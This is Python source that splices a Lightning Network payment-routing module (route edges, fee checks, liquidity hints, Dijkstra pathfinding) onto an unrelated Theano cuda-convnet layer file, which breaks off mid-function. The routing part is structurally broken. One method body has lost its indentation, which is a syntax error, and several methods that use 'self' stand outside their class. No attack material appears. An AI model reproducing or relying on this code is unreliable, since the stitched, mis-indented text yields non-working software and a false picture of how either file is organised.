    """A single hop of a payment path: a directed edge from start_node to
    end_node over a specific channel (no fee/policy information)."""
    start_node = attr.ib(type=bytes, kw_only=True, repr=lambda val: val.hex())
    end_node = attr.ib(type=bytes, kw_only=True, repr=lambda val: val.hex())
    short_channel_id = attr.ib(type=ShortChannelID, kw_only=True, repr=lambda val: str(val))
    @property
    def node_id(self) -> bytes:
        # legacy compat # TODO rm
        return self.end_node
@attr.s
class RouteEdge(PathEdge):
    """A PathEdge annotated with the channel's routing policy (fees, cltv
    delta) and the feature bits of the edge's end node."""
    fee_base_msat = attr.ib(type=int, kw_only=True)
    fee_proportional_millionths = attr.ib(type=int, kw_only=True)
    cltv_expiry_delta = attr.ib(type=int, kw_only=True)
    node_features = attr.ib(type=int, kw_only=True, repr=lambda val: str(int(val)))  # note: for end node!
    def fee_for_edge(self, amount_msat: int) -> int:
        """Fee (msat) this edge charges for forwarding amount_msat."""
        return fee_for_edge_msat(forwarded_amount_msat=amount_msat,
                                 fee_base_msat=self.fee_base_msat,
                                 fee_proportional_millionths=self.fee_proportional_millionths)
    @classmethod
    def from_channel_policy(
            cls,
            *,
            channel_policy: 'Policy',
            short_channel_id: bytes,
            start_node: bytes,
            end_node: bytes,
            node_info: Optional[NodeInfo],  # for end_node
    ) -> 'RouteEdge':
        """Build a RouteEdge from a gossip channel policy; missing node_info
        degrades to node_features=0."""
        assert isinstance(short_channel_id, bytes)
        assert type(start_node) is bytes
        assert type(end_node) is bytes
        return RouteEdge(
            start_node=start_node,
            end_node=end_node,
            short_channel_id=ShortChannelID.normalize(short_channel_id),
            fee_base_msat=channel_policy.fee_base_msat,
            fee_proportional_millionths=channel_policy.fee_proportional_millionths,
            cltv_expiry_delta=channel_policy.cltv_expiry_delta,
            node_features=node_info.features if node_info else 0)
    def is_sane_to_use(self, amount_msat: int) -> bool:
        """Heuristic per-edge filter: reject absurd cltv deltas or fees."""
        # TODO revise ad-hoc heuristics
        # cltv cannot be more than 2 weeks
        if self.cltv_expiry_delta > 14 * 576:
            return False
        total_fee = self.fee_for_edge(amount_msat)
        if not is_fee_sane(total_fee, payment_amount_msat=amount_msat):
            return False
        return True
    def has_feature_varonion(self) -> bool:
        # whether the end node advertises variable-length onion support
        features = LnFeatures(self.node_features)
        return features.supports(LnFeatures.VAR_ONION_OPT)
    def is_trampoline(self) -> bool:
        return False
@attr.s
class TrampolineEdge(RouteEdge):
    """RouteEdge for a trampoline hop: carries invoice routing info/features
    instead of a real channel id."""
    invoice_routing_info = attr.ib(type=bytes, default=None)
    invoice_features = attr.ib(type=int, default=None)
    # this is re-defined from parent just to specify a default value:
    short_channel_id = attr.ib(default=ShortChannelID(8), repr=lambda val: str(val))
    def is_trampoline(self):
        return True
LNPaymentPath = Sequence[PathEdge]  # a path: ordered hops without fee/policy info
LNPaymentRoute = Sequence[RouteEdge]  # a route: path annotated with fees/cltv per hop
def is_route_sane_to_use(route: LNPaymentRoute, invoice_amount_msat: int, min_final_cltv_expiry: int) -> bool:
    """Run some sanity checks on the whole route, before attempting to use it.
    called when we are paying; so e.g. lower cltv is better
    """
    if len(route) > NUM_MAX_EDGES_IN_PAYMENT_PATH:
        return False
    amt = invoice_amount_msat
    cltv = min_final_cltv_expiry
    # walk the route backwards, compounding each hop's forwarding fee and
    # cltv delta; the first edge is excluded — presumably because it is our
    # own channel, which charges us no fee (TODO confirm)
    for route_edge in reversed(route[1:]):
        if not route_edge.is_sane_to_use(amt): return False
        amt += route_edge.fee_for_edge(amt)
        cltv += route_edge.cltv_expiry_delta
    total_fee = amt - invoice_amount_msat
    # TODO revise ad-hoc heuristics
    if cltv > NBLOCK_CLTV_EXPIRY_TOO_FAR_INTO_FUTURE:
        return False
    if not is_fee_sane(total_fee, payment_amount_msat=invoice_amount_msat):
        return False
    return True
def is_fee_sane(fee_msat: int, *, payment_amount_msat: int) -> bool:
    """Heuristic: a fee is acceptable if it is at most 5 sat in absolute
    terms, or at most 1% of the payment amount."""
    # fees <= 5 sat are fine
    if fee_msat <= 5_000:
        return True
    # fees <= 1 % of payment are fine
    return 100 * fee_msat <= payment_amount_msat
class LiquidityHint:
    """Encodes the amounts that can and cannot be sent over the direction of a
    channel and whether the channel is blacklisted.

    A LiquidityHint is the value of a dict, which is keyed to node ids and the
    channel.

    Invariants maintained by the setters:
    * a known-sendable amount is never lowered, a known-unsendable amount is
      never raised;
    * can_send stays strictly below cannot_send for each direction (the
      conflicting bound is dropped);
    * learning that an amount cannot be sent in one direction implies it can
      be sent in the opposite direction (the funds sit on the other side).
    """
    def __init__(self):
        # use "can_send_forward + can_send_backward < cannot_send_forward + cannot_send_backward" as a sanity check?
        self._can_send_forward = None
        self._cannot_send_forward = None
        self._can_send_backward = None
        self._cannot_send_backward = None
        self.blacklist_timestamp = 0  # unix time of last blacklisting, 0 = never
        self.hint_timestamp = 0  # unix time the liquidity info was last updated
        self._inflight_htlcs_forward = 0
        self._inflight_htlcs_backward = 0

    def is_hint_invalid(self) -> bool:
        """Whether the liquidity info is older than HINT_DURATION and should
        be ignored."""
        now = int(time.time())
        return now - self.hint_timestamp > HINT_DURATION

    @property
    def can_send_forward(self):
        return None if self.is_hint_invalid() else self._can_send_forward

    @can_send_forward.setter
    def can_send_forward(self, amount):
        # we don't want to record less significant info
        # (sendable amount is lower than known sendable amount):
        if self._can_send_forward and self._can_send_forward > amount:
            return
        self._can_send_forward = amount
        # we make a sanity check that sendable amount is lower than not sendable amount
        if self._cannot_send_forward and self._can_send_forward > self._cannot_send_forward:
            self._cannot_send_forward = None

    @property
    def can_send_backward(self):
        return None if self.is_hint_invalid() else self._can_send_backward

    @can_send_backward.setter
    def can_send_backward(self, amount):
        # mirror of can_send_forward for the opposite direction
        if self._can_send_backward and self._can_send_backward > amount:
            return
        self._can_send_backward = amount
        if self._cannot_send_backward and self._can_send_backward > self._cannot_send_backward:
            self._cannot_send_backward = None

    @property
    def cannot_send_forward(self):
        return None if self.is_hint_invalid() else self._cannot_send_forward

    @cannot_send_forward.setter
    def cannot_send_forward(self, amount):
        # we don't want to record less significant info
        # (not sendable amount is higher than known not sendable amount):
        if self._cannot_send_forward and self._cannot_send_forward < amount:
            return
        self._cannot_send_forward = amount
        if self._can_send_forward and self._can_send_forward > self._cannot_send_forward:
            self._can_send_forward = None
        # if we can't send over the channel, we should be able to send in the
        # reverse direction
        self.can_send_backward = amount

    @property
    def cannot_send_backward(self):
        return None if self.is_hint_invalid() else self._cannot_send_backward

    @cannot_send_backward.setter
    def cannot_send_backward(self, amount):
        # mirror of cannot_send_forward for the opposite direction
        if self._cannot_send_backward and self._cannot_send_backward < amount:
            return
        self._cannot_send_backward = amount
        if self._can_send_backward and self._can_send_backward > self._cannot_send_backward:
            self._can_send_backward = None
        self.can_send_forward = amount

    def can_send(self, is_forward_direction: bool):
        """Known-sendable amount for the given direction (None if unknown or
        stale)."""
        if is_forward_direction:
            return self.can_send_forward
        else:
            return self.can_send_backward

    def cannot_send(self, is_forward_direction: bool):
        """Known-unsendable amount for the given direction (None if unknown
        or stale)."""
        if is_forward_direction:
            return self.cannot_send_forward
        else:
            return self.cannot_send_backward

    def update_can_send(self, is_forward_direction: bool, amount: int):
        """Record a successful (partial) forward of `amount` and refresh the
        hint timestamp."""
        self.hint_timestamp = int(time.time())
        if is_forward_direction:
            self.can_send_forward = amount
        else:
            self.can_send_backward = amount

    def update_cannot_send(self, is_forward_direction: bool, amount: int):
        """Record a failed forward of `amount` and refresh the hint
        timestamp."""
        self.hint_timestamp = int(time.time())
        if is_forward_direction:
            self.cannot_send_forward = amount
        else:
            self.cannot_send_backward = amount

    def num_inflight_htlcs(self, is_forward_direction: bool) -> int:
        """Number of currently in-flight HTLCs in the given direction."""
        if is_forward_direction:
            return self._inflight_htlcs_forward
        else:
            return self._inflight_htlcs_backward

    def add_htlc(self, is_forward_direction: bool):
        """Register an in-flight HTLC for the given direction."""
        if is_forward_direction:
            self._inflight_htlcs_forward += 1
        else:
            self._inflight_htlcs_backward += 1

    def remove_htlc(self, is_forward_direction: bool):
        """Unregister an in-flight HTLC for the given direction (counter is
        clamped at zero)."""
        if is_forward_direction:
            self._inflight_htlcs_forward = max(0, self._inflight_htlcs_forward - 1)
        else:
            # BUGFIX: previously decremented based on the *forward* counter
            # (self._inflight_htlcs_forward - 1), which corrupted the
            # backward in-flight HTLC count.
            self._inflight_htlcs_backward = max(0, self._inflight_htlcs_backward - 1)

    def __repr__(self):
        is_blacklisted = False if not self.blacklist_timestamp else int(time.time()) - self.blacklist_timestamp < BLACKLIST_DURATION
        return f"forward: can send: {self._can_send_forward} msat, cannot send: {self._cannot_send_forward} msat, htlcs: {self._inflight_htlcs_forward}\n" \
               f"backward: can send: {self._can_send_backward} msat, cannot send: {self._cannot_send_backward} msat, htlcs: {self._inflight_htlcs_backward}\n" \
               f"blacklisted: {is_blacklisted}"
class LiquidityHintMgr:
    """Implements liquidity hints for channels in the graph.

    This class can be used to update liquidity information about channels in the
    graph. Implements a penalty function for edge weighting in the pathfinding
    algorithm that favors channels which can route payments and penalizes
    channels that cannot.

    Direction convention: for a channel between node_from and node_to, the
    boolean `node_from < node_to` (byte-wise pubkey comparison) selects the
    "forward" direction of the channel's LiquidityHint.
    """
    # TODO: hints based on node pairs only (shadow channels, non-strict forwarding)?
    def __init__(self):
        self.lock = RLock()
        self._liquidity_hints: Dict[ShortChannelID, LiquidityHint] = {}

    @with_lock
    def get_hint(self, channel_id: ShortChannelID) -> LiquidityHint:
        """Return the hint for channel_id, creating a fresh one if absent."""
        hint = self._liquidity_hints.get(channel_id)
        if not hint:
            hint = LiquidityHint()
            self._liquidity_hints[channel_id] = hint
        return hint

    @with_lock
    def update_can_send(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID, amount: int):
        """Record that `amount` msat could be sent from node_from to node_to."""
        hint = self.get_hint(channel_id)
        hint.update_can_send(node_from < node_to, amount)

    @with_lock
    def update_cannot_send(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID, amount: int):
        """Record that `amount` msat could NOT be sent from node_from to node_to."""
        hint = self.get_hint(channel_id)
        hint.update_cannot_send(node_from < node_to, amount)

    @with_lock
    def add_htlc(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID):
        """Register an in-flight HTLC on the channel in the given direction."""
        hint = self.get_hint(channel_id)
        hint.add_htlc(node_from < node_to)

    @with_lock
    def remove_htlc(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID):
        """Unregister an in-flight HTLC on the channel in the given direction."""
        hint = self.get_hint(channel_id)
        hint.remove_htlc(node_from < node_to)

    def penalty(self, node_from: bytes, node_to: bytes, channel_id: ShortChannelID, amount: int) -> float:
        """Gives a penalty when sending from node1 to node2 over channel_id with an
        amount in units of millisatoshi.

        The penalty depends on the can_send and cannot_send values that was
        possibly recorded in previous payment attempts.

        A channel that can send an amount is assigned a penalty of zero, a
        channel that cannot send an amount is assigned an infinite penalty.
        If the sending amount lies between can_send and cannot_send, there's
        uncertainty and we give a default penalty. The default penalty
        serves the function of giving a positive offset (the Dijkstra
        algorithm doesn't work with negative weights), from which we can discount
        from. There is a competition between low-fee channels and channels where
        we know with some certainty that they can support a payment. The penalty
        ultimately boils down to: how much more fees do we want to pay for
        certainty of payment success? This can be tuned via DEFAULT_PENALTY_BASE_MSAT
        and DEFAULT_PENALTY_PROPORTIONAL_MILLIONTH. A base _and_ relative penalty
        was chosen such that the penalty will be able to compete with the regular
        base and relative fees.
        """
        # we only evaluate hints here, so use dict get (to not create many hints with self.get_hint)
        hint = self._liquidity_hints.get(channel_id)
        if not hint:
            can_send, cannot_send, num_inflight_htlcs = None, None, 0
        else:
            can_send = hint.can_send(node_from < node_to)
            cannot_send = hint.cannot_send(node_from < node_to)
            num_inflight_htlcs = hint.num_inflight_htlcs(node_from < node_to)
        if cannot_send is not None and amount >= cannot_send:
            return inf
        if can_send is not None and amount <= can_send:
            return 0
        # uncertain range: default penalty, scaled up per in-flight HTLC
        success_fee = fee_for_edge_msat(amount, DEFAULT_PENALTY_BASE_MSAT, DEFAULT_PENALTY_PROPORTIONAL_MILLIONTH)
        inflight_htlc_fee = num_inflight_htlcs * success_fee
        return success_fee + inflight_htlc_fee

    @with_lock
    def add_to_blacklist(self, channel_id: ShortChannelID):
        """Blacklist channel_id for BLACKLIST_DURATION from now."""
        hint = self.get_hint(channel_id)
        now = int(time.time())
        hint.blacklist_timestamp = now

    @with_lock
    def get_blacklist(self) -> Set[ShortChannelID]:
        """Channels whose blacklisting has not yet expired."""
        now = int(time.time())
        return set(k for k, v in self._liquidity_hints.items() if now - v.blacklist_timestamp < BLACKLIST_DURATION)

    @with_lock
    def clear_blacklist(self):
        """Drop all blacklist entries (hints themselves are kept)."""
        # only the values are needed, so iterate .values() instead of .items()
        for hint in self._liquidity_hints.values():
            hint.blacklist_timestamp = 0

    @with_lock
    def reset_liquidity_hints(self):
        """Invalidate all liquidity hints (blacklist state is kept)."""
        for hint in self._liquidity_hints.values():
            hint.hint_timestamp = 0

    def __repr__(self):
        string = "liquidity hints:\n"
        if self._liquidity_hints:
            for k, v in self._liquidity_hints.items():
                string += f"{k}: {v}\n"
        return string
class LNPathFinder(Logger):
    def __init__(self, channel_db: ChannelDB):
        # Logger.__init__ sets up self.logger
        Logger.__init__(self)
        self.channel_db = channel_db
        # per-channel liquidity knowledge gathered from payment attempts
        self.liquidity_hints = LiquidityHintMgr()
    def update_liquidity_hints(
            self,
            route: LNPaymentRoute,
            amount_msat: int,
            failing_channel: ShortChannelID=None
    ):
        """Fold the outcome of a payment attempt into the liquidity hints.

        Channels before `failing_channel` are recorded as able to forward
        `amount_msat`; the failing channel itself is recorded as unable, and
        the rest of the route is left untouched. If failing_channel is None,
        the whole route is recorded as a success.
        """
        # go through the route and record successes until the failing channel is reached,
        # for the failing channel, add a cannot_send liquidity hint
        # note: actual routable amounts are slightly different than reported here
        # as fees would need to be added
        for r in route:
            if r.short_channel_id != failing_channel:
                self.logger.info(f"report {r.short_channel_id} to be able to forward {amount_msat} msat")
                self.liquidity_hints.update_can_send(r.start_node, r.end_node, r.short_channel_id, amount_msat)
            else:
                self.logger.info(f"report {r.short_channel_id} to be unable to forward {amount_msat} msat")
                self.liquidity_hints.update_cannot_send(r.start_node, r.end_node, r.short_channel_id, amount_msat)
                break
def update_inflight_htlcs(self, route: LNPaymentRoute, add_htlcs: bool):
self.logger.info(f"{'Adding' if add_htlcs else 'Removing'} inflight htlcs to graph (liquidity hints).")
for r in route:
if add_htlcs:
self.liquidity_hints.add_htlc(r.start_node, r.end_node, r.short_channel_id)
else:
self.liquidity_hints.remove_htlc(r.start_node, r.end_node, r.short_channel_id)
    def _edge_cost(
            self,
            *,
            short_channel_id: bytes,
            start_node: bytes,
            end_node: bytes,
            payment_amt_msat: int,
            ignore_costs=False,
            is_mine=False,
            my_channels: Dict[ShortChannelID, 'Channel'] = None,
            private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
    ) -> Tuple[float, int]:
        """Heuristic cost (distance metric) of going through a channel.
        Returns (heuristic_cost, fee_for_edge_msat).

        A cost of float('inf') marks the edge as unusable (unknown channel,
        missing/disabled policy, or amount outside the channel's limits).
        With ignore_costs=True a flat base penalty is returned instead of the
        fee/cltv/liquidity-based cost.
        """
        if private_route_edges is None:
            private_route_edges = {}
        channel_info = self.channel_db.get_channel_info(
            short_channel_id, my_channels=my_channels, private_route_edges=private_route_edges)
        if channel_info is None:
            return float('inf'), 0
        channel_policy = self.channel_db.get_policy_for_node(
            short_channel_id, start_node, my_channels=my_channels, private_route_edges=private_route_edges)
        if channel_policy is None:
            return float('inf'), 0
        # channels that did not publish both policies often return temporary channel failure
        channel_policy_backwards = self.channel_db.get_policy_for_node(
            short_channel_id, end_node, my_channels=my_channels, private_route_edges=private_route_edges)
        if (channel_policy_backwards is None
                and not is_mine
                and short_channel_id not in private_route_edges):
            return float('inf'), 0
        if channel_policy.is_disabled():
            return float('inf'), 0
        if payment_amt_msat < channel_policy.htlc_minimum_msat:
            return float('inf'), 0  # payment amount too little
        if channel_info.capacity_sat is not None and \
                payment_amt_msat // 1000 > channel_info.capacity_sat:
            return float('inf'), 0  # payment amount too large
        if channel_policy.htlc_maximum_msat is not None and \
                payment_amt_msat > channel_policy.htlc_maximum_msat:
            return float('inf'), 0  # payment amount too large
        # prefer an explicitly supplied private edge; otherwise build one
        # from the public gossip policy
        route_edge = private_route_edges.get(short_channel_id, None)
        if route_edge is None:
            node_info = self.channel_db.get_node_info_for_node_id(node_id=end_node)
            route_edge = RouteEdge.from_channel_policy(
                channel_policy=channel_policy,
                short_channel_id=short_channel_id,
                start_node=start_node,
                end_node=end_node,
                node_info=node_info)
        if not route_edge.is_sane_to_use(payment_amt_msat):
            return float('inf'), 0  # thanks but no thanks
        # Distance metric notes:  # TODO constants are ad-hoc
        # ( somewhat based on https://github.com/lightningnetwork/lnd/pull/1358 )
        # - Edges have a base cost. (more edges -> less likely none will fail)
        # - The larger the payment amount, and the longer the CLTV,
        #   the more irritating it is if the HTLC gets stuck.
        # - Paying lower fees is better. :)
        if ignore_costs:
            return DEFAULT_PENALTY_BASE_MSAT, 0
        fee_msat = route_edge.fee_for_edge(payment_amt_msat)
        cltv_cost = route_edge.cltv_expiry_delta * payment_amt_msat * 15 / 1_000_000_000
        # the liquidty penalty takes care we favor edges that should be able to forward
        # the payment and penalize edges that cannot
        liquidity_penalty = self.liquidity_hints.penalty(start_node, end_node, short_channel_id, payment_amt_msat)
        overall_cost = fee_msat + cltv_cost + liquidity_penalty
        return overall_cost, fee_msat
def get_shortest_path_hops(
        self,
        *,
        nodeA: bytes,
        nodeB: bytes,
        invoice_amount_msat: int,
        my_sending_channels: Dict[ShortChannelID, 'Channel'] = None,
        private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Dict[bytes, PathEdge]:
    """Run a reverse Dijkstra search from nodeB towards nodeA.

    Returns a predecessor map: node id -> PathEdge leading from that node
    towards nodeB.  A map that does not contain nodeA means no path was
    found.  If nodeA == nodeB, a circular path is searched for.
    """
    # note: we don't lock self.channel_db, so while the path finding runs,
    # the underlying graph could potentially change... (not good but maybe ~OK?)
    # run Dijkstra
    # The search is run in the REVERSE direction, from nodeB to nodeA,
    # to properly calculate compound routing fees.
    blacklist = self.liquidity_hints.get_blacklist()
    distance_from_start = defaultdict(lambda: float('inf'))
    distance_from_start[nodeB] = 0
    previous_hops = {}  # type: Dict[bytes, PathEdge]
    nodes_to_explore = queue.PriorityQueue()
    nodes_to_explore.put((0, invoice_amount_msat, nodeB))  # order of fields (in tuple) matters!
    # main loop of search
    while nodes_to_explore.qsize() > 0:
        dist_to_edge_endnode, amount_msat, edge_endnode = nodes_to_explore.get()
        if edge_endnode == nodeA and previous_hops:  # previous_hops check for circular paths
            self.logger.info("found a path")
            break
        if dist_to_edge_endnode != distance_from_start[edge_endnode]:
            # queue.PriorityQueue does not implement decrease_priority,
            # so instead of decreasing priorities, we add items again into the queue.
            # so there are duplicates in the queue, that we discard now:
            continue
        if nodeA == nodeB:  # we want circular paths
            if not previous_hops:  # in the first node exploration step, we only take receiving channels
                channels_for_endnode = self.channel_db.get_channels_for_node(
                    edge_endnode, my_channels={}, private_route_edges=private_route_edges)
            else:  # in the next steps, we only take sending channels
                channels_for_endnode = self.channel_db.get_channels_for_node(
                    edge_endnode, my_channels=my_sending_channels, private_route_edges={})
        else:
            channels_for_endnode = self.channel_db.get_channels_for_node(
                edge_endnode, my_channels=my_sending_channels, private_route_edges=private_route_edges)
        for edge_channel_id in channels_for_endnode:
            assert isinstance(edge_channel_id, bytes)
            if blacklist and edge_channel_id in blacklist:
                continue
            channel_info = self.channel_db.get_channel_info(
                edge_channel_id, my_channels=my_sending_channels, private_route_edges=private_route_edges)
            if channel_info is None:
                continue
            # the far endpoint of this channel, as seen from edge_endnode
            edge_startnode = channel_info.node2_id if channel_info.node1_id == edge_endnode else channel_info.node1_id
            is_mine = edge_channel_id in my_sending_channels
            if is_mine:
                if edge_startnode == nodeA:  # payment outgoing, on our channel
                    # our channel must be able to send this amount (incl. accumulated fees)
                    if not my_sending_channels[edge_channel_id].can_pay(amount_msat, check_frozen=True):
                        continue
            edge_cost, fee_for_edge_msat = self._edge_cost(
                short_channel_id=edge_channel_id,
                start_node=edge_startnode,
                end_node=edge_endnode,
                payment_amt_msat=amount_msat,
                ignore_costs=(edge_startnode == nodeA),
                is_mine=is_mine,
                my_channels=my_sending_channels,
                private_route_edges=private_route_edges)
            alt_dist_to_neighbour = distance_from_start[edge_endnode] + edge_cost
            if alt_dist_to_neighbour < distance_from_start[edge_startnode]:
                distance_from_start[edge_startnode] = alt_dist_to_neighbour
                previous_hops[edge_startnode] = PathEdge(
                    start_node=edge_startnode,
                    end_node=edge_endnode,
                    short_channel_id=ShortChannelID(edge_channel_id))
                # fees for this hop are paid on top of the amount forwarded through it
                amount_to_forward_msat = amount_msat + fee_for_edge_msat
                nodes_to_explore.put((alt_dist_to_neighbour, amount_to_forward_msat, edge_startnode))
        # for circular paths, we already explored the end node, but this
        # is also our start node, so set it to unexplored
        if edge_endnode == nodeB and nodeA == nodeB:
            distance_from_start[edge_endnode] = float('inf')
    return previous_hops
@profiler
def find_path_for_payment(
        self,
        *,
        nodeA: bytes,
        nodeB: bytes,
        invoice_amount_msat: int,
        my_sending_channels: Dict[ShortChannelID, 'Channel'] = None,
        private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Optional[LNPaymentPath]:
    """Return a path from nodeA to nodeB, or None if no path was found.

    The search (get_shortest_path_hops) runs in reverse, so the predecessor
    map is walked forwards from nodeA here to reconstruct the path.
    """
    assert type(nodeA) is bytes
    assert type(nodeB) is bytes
    assert type(invoice_amount_msat) is int
    if my_sending_channels is None:
        my_sending_channels = {}
    previous_hops = self.get_shortest_path_hops(
        nodeA=nodeA,
        nodeB=nodeB,
        invoice_amount_msat=invoice_amount_msat,
        my_sending_channels=my_sending_channels,
        private_route_edges=private_route_edges)
    if nodeA not in previous_hops:
        return None  # no path found
    # backtrack from search_end (nodeA) to search_start (nodeB)
    # FIXME paths cannot be longer than 20 edges (onion packet)...
    edge_startnode = nodeA
    path = []
    while edge_startnode != nodeB or not path:  # second condition for circular paths
        edge = previous_hops[edge_startnode]
        path += [edge]
        edge_startnode = edge.node_id
    return path
def create_route_from_path(
        self,
        path: Optional[LNPaymentPath],
        *,
        my_channels: Dict[ShortChannelID, 'Channel'] = None,
        private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> LNPaymentRoute:
    """Convert a bare path into a route of RouteEdges.

    Each edge is validated against the channel db (endpoints and chaining);
    edges present in private_route_edges are used as-is, all others get a
    RouteEdge built from the channel policy of their start node.
    """
    if path is None:
        raise Exception('cannot create route from None path')
    if private_route_edges is None:
        private_route_edges = {}
    route = []
    expected_start = path[0].start_node
    for edge in path:
        scid = edge.short_channel_id
        endpoints = self.channel_db.get_endnodes_for_chan(scid, my_channels=my_channels)
        if endpoints and sorted(endpoints) != sorted([edge.start_node, edge.end_node]):
            raise LNPathInconsistent("endpoints of edge inconsistent with short_channel_id")
        if edge.start_node != expected_start:
            raise LNPathInconsistent("edges do not chain together")
        hop = private_route_edges.get(scid)
        if hop is None:
            policy = self.channel_db.get_policy_for_node(
                short_channel_id=scid,
                node_id=edge.start_node,
                my_channels=my_channels)
            if policy is None:
                raise NoChannelPolicy(scid)
            node_info = self.channel_db.get_node_info_for_node_id(node_id=edge.end_node)
            hop = RouteEdge.from_channel_policy(
                channel_policy=policy,
                short_channel_id=scid,
                start_node=edge.start_node,
                end_node=edge.end_node,
                node_info=node_info)
        route.append(hop)
        expected_start = edge.end_node
    return route
def find_route(
        self,
        *,
        nodeA: bytes,
        nodeB: bytes,
        invoice_amount_msat: int,
        path = None,
        my_sending_channels: Dict[ShortChannelID, 'Channel'] = None,
        private_route_edges: Dict[ShortChannelID, RouteEdge] = None,
) -> Optional[LNPaymentRoute]:
    """Find a route from nodeA to nodeB (searching for a path first if
    none is given) and return it, or None if no path exists."""
    if not path:
        path = self.find_path_for_payment(
            nodeA=nodeA,
            nodeB=nodeB,
            invoice_amount_msat=invoice_amount_msat,
            my_sending_channels=my_sending_channels,
            private_route_edges=private_route_edges)
    if not path:
        return None
    return self.create_route_from_path(
        path, my_channels=my_sending_channels, private_route_edges=private_route_edges)
|
|
import numpy as np
import theano
import theano.tensor as T
from .. import init
from .. import nonlinearities
from . import base
from theano.sandbox.cuda.basic_ops import gpu_contiguous
# TODO: make sure to document the limitations and 'best practices' (i.e. minibatch size % 128 == 0)
# TODO: see if the 'dimshuffle' logic can be put in the base class instead.
# base class for all layers that use ops from pylearn2.sandbox.cuda_convnet
class CCLayer(base.Layer):
    """Marker base class for layers built on pylearn2 cuda-convnet ops."""
    pass
class Conv2DCCLayer(CCLayer):
    """2D convolution layer backed by pylearn2's cuda-convnet FilterActs op.

    cuda-convnet requires square filters and strides, num_filters divisible
    by 16, and c01b axis order.  With dimshuffle=True the layer accepts and
    returns bc01 (theano convention) and shuffles internally.
    """
    def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,
                 W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,
                 dimshuffle=True, flip_filters=False, partial_sum=1):
        # imported lazily so the module can be imported without pylearn2 installed
        from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
        super(Conv2DCCLayer, self).__init__(input_layer)
        if nonlinearity is None:
            self.nonlinearity = nonlinearities.identity
        else:
            self.nonlinearity = nonlinearity
        # cuda-convnet restrictions: square filters/strides, num_filters % 16 == 0
        if filter_size[0] != filter_size[1]:
            raise RuntimeError("Conv2DCCLayer only supports square filters, but filter_size=(%d, %d)" % filter_size)
        if strides[0] != strides[1]:
            raise RuntimeError("Conv2DCCLayer only supports square strides, but strides=(%d, %d)" % strides)
        if num_filters % 16 != 0:
            raise RuntimeError("Conv2DCCLayer requires num_filters to be a multiple of 16, but num_filters is %d" % num_filters)
        self.num_filters = num_filters
        self.filter_size = filter_size[0]  # scalar: filters are square
        self.stride = strides[0]  # scalar: strides are equal
        self.untie_biases = untie_biases
        self.dimshuffle = dimshuffle
        self.flip_filters = flip_filters
        self.partial_sum = partial_sum
        # 'border_mode' and 'pad' are two ways of specifying the same padding
        if border_mode is not None and pad is not None:
            raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
        elif border_mode is None and pad is None:
            # no option specified, default to valid mode
            self.pad = 0
        elif border_mode is not None:
            if border_mode == 'valid':
                self.pad = 0
            elif border_mode == 'full':
                self.pad = self.filter_size - 1
            elif border_mode == 'same':
                # only works for odd filter size, but the even filter size case is probably not worth supporting.
                self.pad = (self.filter_size - 1) // 2
            else:
                raise RuntimeError("Unsupported border_mode for Conv2DCCLayer: %s" % border_mode)
        else:
            self.pad = pad
        self.W = self.create_param(W, self.get_W_shape())
        if self.untie_biases:
            # one bias per filter AND output position
            output_shape = self.get_output_shape()
            if self.dimshuffle:
                self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
            else:
                self.b = self.create_param(b, (num_filters, output_shape[1], output_shape[2]))
        else:
            self.b = self.create_param(b, (num_filters,))
        self.filter_acts_op = FilterActs(stride=self.stride, partial_sum=self.partial_sum, pad=self.pad)
    def get_W_shape(self):
        # bc01: (filters, channels, h, w); c01b: (channels, h, w, filters)
        if self.dimshuffle:
            num_input_channels = self.input_layer.get_output_shape()[1]
            return (self.num_filters, num_input_channels, self.filter_size, self.filter_size)
        else:
            num_input_channels = self.input_layer.get_output_shape()[0]
            return (num_input_channels, self.filter_size, self.filter_size, self.num_filters)
    def get_params(self):
        return [self.W, self.b]
    def get_bias_params(self):
        return [self.b]
    def get_output_shape_for(self, input_shape):
        if self.dimshuffle:
            batch_size = input_shape[0]
            input_width, input_height = input_shape[2:4]
        else:
            batch_size = input_shape[3]
            input_width, input_height = input_shape[1:3]
        # standard conv output size with padding and stride
        output_width = (input_width + 2*self.pad - self.filter_size) // self.stride + 1
        output_height = (input_height + 2*self.pad - self.filter_size) // self.stride + 1
        if self.dimshuffle:
            return (batch_size, self.num_filters, output_width, output_height)
        else:
            return (self.num_filters, output_width, output_height, batch_size)
    def get_output_for(self, input, *args, **kwargs):
        if self.dimshuffle:
            filters = self.W.dimshuffle(1, 2, 3, 0) # bc01 to c01b
            input = input.dimshuffle(1, 2, 3, 0) # bc01 to c01b
        else:
            filters = self.W
        if self.flip_filters:
            filters = filters[:, ::-1, ::-1, :] # flip width, height
        # FilterActs requires contiguous inputs
        contiguous_filters = gpu_contiguous(filters)
        contiguous_input = gpu_contiguous(input)
        conved = self.filter_acts_op(contiguous_input, contiguous_filters)
        if self.untie_biases:
            biases = self.b.dimshuffle(0, 1, 2, 'x') # c01 to c01b
        else:
            biases = self.b.dimshuffle(0, 'x', 'x', 'x') # c to c01b
        conved += biases
        conved = self.nonlinearity(conved)
        if self.dimshuffle:
            return conved.dimshuffle(3, 0, 1, 2) # c01b to bc01
        else:
            return conved
class MaxPool2DCCLayer(CCLayer):
    """2D max pooling backed by pylearn2's cuda-convnet MaxPool op.

    Only square pooling regions and equal strides are supported; borders
    are never ignored (ignore_border exists only for API compatibility).
    """
    def __init__(self, input_layer, ds, ignore_border=False, strides=None, dimshuffle=True):
        # imported lazily so the module can be imported without pylearn2 installed
        from pylearn2.sandbox.cuda_convnet.pool import MaxPool
        super(MaxPool2DCCLayer, self).__init__(input_layer)
        if ds[0] != ds[1]:
            raise RuntimeError("MaxPool2DCCLayer only supports square pooling regions, but ds=(%d, %d)" % ds)
        if strides is not None and strides[0] != strides[1]:
